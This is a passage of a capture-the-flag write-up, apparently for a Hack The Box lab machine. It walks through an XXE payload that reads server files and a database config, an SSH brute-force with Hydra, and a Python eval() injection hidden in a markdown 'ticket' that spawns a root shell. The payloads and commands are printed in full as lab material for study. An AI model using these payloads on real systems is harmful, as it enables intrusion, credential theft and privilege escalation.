System\n(admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network\nManagement,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd\nResolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-timesync:x:102:104:systemd Time\nSynchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:106::\/nonexistent:\/usr\/sbin\/nologin\nsyslog:x:104:110::\/home\/syslog:\/usr\/sbin\/nologin\n_apt:x:105:65534::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:106:111:TPM software 
stack,,,:\/var\/lib\/tpm:\/bin\/false\nuuidd:x:107:112::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:108:113::\/nonexistent:\/usr\/sbin\/nologin\nlandscape:x:109:115::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:110:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:111:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\ndevelopment:x:1000:1000:Development:\/home\/development:\/bin\/bash\nlxd:x:998:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\nusbmux:x:112:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin<\/textarea><\/div><div class=\"fusion-text fusion-text-15\" style=\"margin-top:10px;\"><p>As we are trying to retrieve <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">php<\/span> source, we can use a PHP stream wrapper ( <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">php:\/\/filter\/convert.base64-encode\/resource=<\/span> ) to get the source code without it executing on the server; Base64-encoding the file also keeps characters such as &lt; in the source from breaking the XML document. The result comes back as Base64 and needs to be decoded.<br \/>\nCleartext payload:<\/p>\n<\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-6 > .CodeMirror, .fusion-syntax-highlighter-6 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-6 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-6 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-6 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span 
class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_6\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_6\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/html\">data=<?xml version=\"1.0\"?>\n<!DOCTYPE foo [\n\t<!ELEMENT foo ANY >\n\t<!ENTITY file SYSTEM \"php:\/\/filter\/convert.base64-encode\/resource=\/var\/www\/html\/db.php\" >]>\n\t<bugreport>\n\t\t<title>`&file;`<\/title>\n\t\t<cwe><\/cwe>\n\t\t<cvss><\/cvss>\n\t\t<reward><\/reward>\n\t<\/bugreport><\/textarea><\/div><div class=\"fusion-text fusion-text-16\" style=\"margin-top:10px;\"><p>Base64 Encoded:<\/p>\n<\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-7 > .CodeMirror, .fusion-syntax-highlighter-7 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-7 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-7 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-7 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_7\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_7\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" 
data-mode=\"text\/html\">data=PD94bWwgIHZlcnNpb249IjEuMCI\/Pg0KPCFET0NUWVBFIGZvbyBbDQogICA8IUVMRU1FTlQgZm9vIEFOWSA+DQogICA8IUVOVElUWSBmaWxlIFNZU1RFTSAicGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT0vdmFyL3d3dy9odG1sL2RiLnBocCIgPl0+DQogICAgICAgIDxidWdyZXBvcnQ+DQogICAgICAgIDx0aXRsZT5gJmZpbGU7YDwvdGl0bGU+DQogICAgICAgIDxjd2U+PC9jd2U+DQogICAgICAgIDxjdnNzPjwvY3Zzcz4NCiAgICAgICAgPHJld2FyZD48L3Jld2FyZD4NCiAgICAgICAgPC9idWdyZXBvcnQ+<\/textarea><\/div><div class=\"fusion-text fusion-text-17\" style=\"margin-top:10px;\"><p>URL Encoded:<\/p>\n<\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-8 > .CodeMirror, .fusion-syntax-highlighter-8 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-8 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-8 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-8 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_8\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_8\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" 
data-mode=\"text\/html\">data=PD94bWwgIHZlcnNpb249IjEuMCI\/Pg0KPCFET0NUWVBFIGZvbyBbDQogICA8IUVMRU1FTlQgZm9vIEFOWSA%2bDQogICA8IUVOVElUWSBmaWxlIFNZU1RFTSAicGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT0vdmFyL3d3dy9odG1sL2RiLnBocCIgPl0%2bDQogICAgICAgIDxidWdyZXBvcnQ%2bDQogICAgICAgIDx0aXRsZT5gJmZpbGU7YDwvdGl0bGU%2bDQogICAgICAgIDxjd2U%2bPC9jd2U%2bDQogICAgICAgIDxjdnNzPjwvY3Zzcz4NCiAgICAgICAgPHJld2FyZD48L3Jld2FyZD4NCiAgICAgICAgPC9idWdyZXBvcnQ%2b<\/textarea><\/div><div class=\"fusion-text fusion-text-18\" style=\"margin-top:10px;\"><p>Provides:<\/p>\n<\/div><div style=\"text-align:center;\"><style>.fusion-imageframe.imageframe-9{ margin-bottom : 10px;}<\/style><span class=\" fusion-imageframe imageframe-none imageframe-9 hover-type-none\"><img decoding=\"async\" width=\"1024\" height=\"208\" title=\"8\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/8.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/8-1024x208.png\" alt class=\"lazyload img-responsive wp-image-427\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%271133%27%20height%3D%27230%27%20viewBox%3D%270%200%201133%20230%27%3E%3Crect%20width%3D%271133%27%20height%3D%27230%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/8-200x41.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/8-400x81.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/8-600x122.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/8-800x162.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/8.png 1133w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 1024px\" \/><\/span><\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-9 > .CodeMirror, .fusion-syntax-highlighter-9 > .CodeMirror .CodeMirror-gutters 
{background-color:var(--awb-color1);}.fusion-syntax-highlighter-9 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-9 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-9 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:15px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_9\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_9\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/txt\">If DB were ready, would have added:\n\tTitle: `PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo\/Pgo=`\n\tCWE:\n\tScore:\n\tReward:<\/textarea><\/div><div class=\"fusion-text fusion-text-19\" style=\"margin-top:10px;\"><p>When we decode the string <style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-10 > .CodeMirror, .fusion-syntax-highlighter-10 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-10 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-10 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-10 fusion-syntax-highlighter-theme-light\" 
style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_10\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_10\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/x-sh\">PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo\/Pgo=<\/textarea><\/div> from base64 we are presented with the database credentials:<\/p>\n<\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-11 > .CodeMirror, .fusion-syntax-highlighter-11 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-11 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-11 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-11 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_11\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_11\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" 
data-mode=\"text\/x-php\"><?php\n\t\/\/ TODO -> Implement login system with the database.\n\t$dbserver = \"localhost\";\n\t$dbname = \"bounty\";\n\t$dbusername = \"admin\";\n\t$dbpassword = \"m19RoAU0hP41A1sTsq6K\";\n\t$testuser = \"test\";\n?><\/textarea><\/div><div class=\"fusion-text fusion-text-20\" style=\"margin-top:10px;\"><p>Now we have two things, <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">usernames<\/span> and <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">credentials<\/span>, so let's push on port 22 with a brute-force login attempt to see if these creds work for any of our enumerated users. I pasted the contents of the recovered <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">\/etc\/passwd<\/span> file into a file named <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">etc_passwd<\/span> on my machine and extracted the users with the command <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">cat etc_passwd | cut -f 1 -d \":\" &gt; users.txt<\/span>, which quickly provides a nice list:<\/p>\n<\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-12 > .CodeMirror, .fusion-syntax-highlighter-12 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-12 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-12 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-12 
fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_12\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_12\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/x-sh\">root\ndaemon\nbin\nsys\nsync\ngames\nman\nlp\nmail\nnews\nuucp\nproxy\nwww-data\nbackup\nlist\nirc\ngnats\nnobody\nsystemd-network\nsystemd-resolve\nsystemd-timesync\nmessagebus\nsyslog\n_apt\ntss\nuuidd\ntcpdump\nlandscape\npollinate\nsshd\nsystemd-coredump\ndevelopment\nlxd\nusbmux<\/textarea><\/div><div class=\"fusion-text fusion-text-21\" style=\"margin-top:10px;\"><p>Using Hydra we can attempt to brute force the logins using:<br \/>\nCommand: <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">hydra -L users.txt -p \u2018m19RoAU0hP41A1sTsq6K\u2019 10.129.193.21 ssh<\/span><\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-10 hover-type-none\"><img decoding=\"async\" width=\"951\" height=\"246\" title=\"9\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/9.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/9.png\" alt class=\"lazyload img-responsive wp-image-431\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%27951%27%20height%3D%27246%27%20viewBox%3D%270%200%20951%20246%27%3E%3Crect%20width%3D%27951%27%20height%3D%27246%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" 
data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/9-200x52.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/9-400x103.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/9-600x155.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/9-800x207.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/9.png 951w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 951px\" \/><\/span><\/div><div class=\"fusion-text fusion-text-22\" style=\"margin-top:10px;\"><p>We found creds: <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">development:m19RoAU0hP41A1sTsq6K<\/span><\/p>\n<\/div><div class=\"fusion-separator fusion-full-width-sep\" style=\"align-self: center;margin-left: auto;margin-right: auto;width:100%;\"><div class=\"fusion-separator-border sep-single sep-dashed\" style=\"border-color:#f4ad24;border-top-width:1px;\"><\/div><\/div><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-4{margin-top:10px!important; margin-right:0px!important;margin-bottom:31px!important;margin-left:0px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-4{margin-top:0px!important; margin-right:0px!important;margin-bottom:20px!important; margin-left:0px!important;}}<\/style><div class=\"fusion-title title fusion-title-4 fusion-title-text fusion-title-size-four\" style=\"margin-top:10px;margin-right:0px;margin-bottom:31px;margin-left:0px;\"><div class=\"title-sep-container title-sep-container-left fusion-no-large-visibility fusion-no-medium-visibility fusion-no-small-visibility\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><span class=\"awb-title-spacer fusion-no-large-visibility fusion-no-medium-visibility fusion-no-small-visibility\"><\/span><h4 
class=\"title-heading-left fusion-responsive-typography-calculated\" style=\"margin:0;--fontSize:18;--minFontSize:18px;line-height:1.5;\">ROOT<\/h4><span class=\"awb-title-spacer\"><\/span><div class=\"title-sep-container title-sep-container-right\"><div class=\"title-sep sep-\" style=\"border-color:#e0dede;\"><\/div><\/div><\/div><div class=\"fusion-text fusion-text-23\"><p>Always check for the low hanging fruit first, here we run <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">sudo -l <\/span>to list the commands our <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">development<\/span> user can run with privileges and are presented with the following:<\/p>\n<\/div><div style=\"text-align:center;\"><span class=\" fusion-imageframe imageframe-none imageframe-11 hover-type-none\"><img decoding=\"async\" width=\"955\" height=\"138\" title=\"10\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/10.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/10.png\" alt class=\"lazyload img-responsive wp-image-432\" srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%27955%27%20height%3D%27138%27%20viewBox%3D%270%200%20955%20138%27%3E%3Crect%20width%3D%27955%27%20height%3D%27138%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/10-200x29.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/10-400x58.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/10-600x87.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/10-800x116.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/10.png 955w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, 
(max-width: 640px) 100vw, 955px\" \/><\/span><\/div><div class=\"fusion-text fusion-text-24\" style=\"margin-top:10px;\"><p>Having a look at the <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">ticketValidator.py<\/span> script:<\/p>\n<\/div><style type=\"text\/css\" scopped=\"scopped\">.fusion-syntax-highlighter-13 > .CodeMirror, .fusion-syntax-highlighter-13 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-13 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-13 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-13 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_13\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_13\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/javascript\">#Skytrain Inc Ticket Validation System 0.1\n#Do not distribute this file.\n\ndef load_file(loc):\n    if loc.endswith(\".md\"): # checks to make sure the filename ends with .md otherwise, exit\n        return open(loc, 'r')\n    else:\n        print(\"Wrong file type.\")\n        exit()\n\ndef evaluate(ticketFile):\n    #Evaluates a ticket to check for ireggularities.\n    code_line = None\n    for i,x in enumerate(ticketFile.readlines()):\n        if i == 0:\n            if not x.startswith(\"# Skytrain Inc\"): # .md file must start with this string\n               
 return False\n            continue\n        if i == 1:\n            if not x.startswith(\"## Ticket to \"): # second line must start with this string\n                return False\n            print(f\"Destination: {' '.join(x.strip().split(' ')[3:])}\") # strips beginning and end spaces then splits the string at spaces and adds the destination provided after the third space\n            continue\n\n        if x.startswith(\"__Ticket Code:__\"): # Third line must start with this string\n            code_line = i+1\n            continue\n\n        if code_line and i == code_line:\n            if not x.startswith(\"**\"): # Fourth line must start with **\n                return False\n            ticketCode = x.replace(\"**\", \"\").split(\"+\")[0] # Strips '**' splits on the first + symbol and assigns sting \/ integers at position 0 to the ticketCode' variable\n            if int(ticketCode) % 7 == 4: # checks that the variable ticketcode (has to be greater than 100) modulo 7 is equal to 4 (this could be 102, 109 etc.)\n                validationNumber = eval(x.replace(\"**\", \"\")) # runs an eval on the provided string (this is where we can inject our code to get root)\n                if validationNumber > 100:\n                    return True\n                else:\n                    return False\n    return False\n\ndef main():\n    fileName = input(\"Please enter the path to the ticket file.\\n\")\n    ticket = load_file(fileName)\n    #DEBUG print(ticket)\n    result = evaluate(ticket)\n    if (result):\n        print(\"Valid ticket.\")\n    else:\n        print(\"Invalid ticket.\")\n    ticket.close\n\nmain()<\/textarea><\/div><div class=\"fusion-text fusion-text-25\" style=\"margin-top:10px;\"><p>Lets create the markdown file to exploit root:<span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">apple.md<\/span><\/p>\n<\/div><style type=\"text\/css\" 
scopped=\"scopped\">.fusion-syntax-highlighter-14 > .CodeMirror, .fusion-syntax-highlighter-14 > .CodeMirror .CodeMirror-gutters {background-color:var(--awb-color1);}.fusion-syntax-highlighter-14 > .CodeMirror .CodeMirror-gutters { background-color: var(--awb-color2); }.fusion-syntax-highlighter-14 > .CodeMirror .CodeMirror-linenumber { color: var(--awb-color8); }<\/style><div class=\"fusion-syntax-highlighter-container fusion-syntax-highlighter-14 fusion-syntax-highlighter-theme-light\" style=\"opacity:0;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;font-size:14px;border-width:1px;border-style:solid;border-color:#f4ad24;\"><div class=\"syntax-highlighter-copy-code\"><span class=\"syntax-highlighter-copy-code-title\" data-id=\"fusion_syntax_highlighter_14\" style=\"font-size:14px;\">Copy to Clipboard<\/span><\/div><textarea class=\"fusion-syntax-highlighter-textarea\" id=\"fusion_syntax_highlighter_14\" data-readOnly=\"nocursor\" data-lineNumbers=\"1\" data-lineWrapping=\"\" data-theme=\"default\" data-mode=\"text\/md\"># Skytrain Inc\n## Ticket to root\n__Ticket Code:__\n**109+ 0 and __import__('os').system('\/bin\/bash')\n##Issued: 2021\/06\/21\n#End Ticket<\/textarea><\/div><div class=\"fusion-text fusion-text-26\" style=\"margin-top:10px;\"><p>The <span class=\"fusion-highlight custom-textcolor highlight1 awb-highlight-background rounded\" style=\"background-color:#f3f3f3;color:#000000;\">apple.md<\/span> file spawns a new root bash shell: the validator, run with the privileges listed by sudo -l, passes the ticket code line to eval(), which executes the whole expression as Python rather than just computing a number.<\/p>\n<\/div><div style=\"text-align:center;\"><style>.fusion-imageframe.imageframe-12{ margin-bottom : 10px;}<\/style><span class=\" fusion-imageframe imageframe-none imageframe-12 hover-type-none\"><img decoding=\"async\" width=\"842\" height=\"141\" title=\"11\" src=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/11.png\" data-orig-src=\"http:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/11.png\" alt class=\"lazyload img-responsive wp-image-433\" 
srcset=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20width%3D%27842%27%20height%3D%27141%27%20viewBox%3D%270%200%20842%20141%27%3E%3Crect%20width%3D%27842%27%20height%3D%27141%27%20fill-opacity%3D%220%22%2F%3E%3C%2Fsvg%3E\" data-srcset=\"https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/11-200x33.png 200w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/11-400x67.png 400w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/11-600x100.png 600w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/11-800x134.png 800w, https:\/\/www.kylemoffat.ca\/wp-content\/uploads\/2021\/09\/11.png 842w\" data-sizes=\"auto\" data-orig-sizes=\"(max-width: 1024px) 100vw, (max-width: 640px) 100vw, 842px\" \/><\/span><\/div><div class=\"fusion-separator fusion-full-width-sep\" style=\"align-self: center;margin-left: auto;margin-right: auto;width:100%;\"><div class=\"fusion-separator-border sep-single sep-dashed\" style=\"border-color:#f4ad24;border-top-width:1px;\"><\/div><\/div><div class=\"fusion-text fusion-text-27\" style=\"margin-top:10px;\"><p><strong>Happy Hacking Folks!<\/strong><br \/>\n<em>Cheerz<\/em><\/p>\n<\/div><\/div><style type=\"text\/css\">.fusion-body .fusion-builder-column-0{width:80% !important;margin-top : 0px;margin-bottom : 20px;}.fusion-builder-column-0 > .fusion-column-wrapper {padding-top : 0px !important;padding-right : 0px !important;margin-right : 2.4%;padding-bottom : 0px !important;padding-left : 5% !important;margin-left : 2.4%;}@media only screen and (max-width:1024px) {.fusion-body .fusion-builder-column-0{width:100% !important;order : 0;}.fusion-builder-column-0 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}@media only screen and (max-width:640px) {.fusion-body .fusion-builder-column-0{width:100% !important;order : 0;}.fusion-builder-column-0 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}<\/style><\/div><\/div><style 
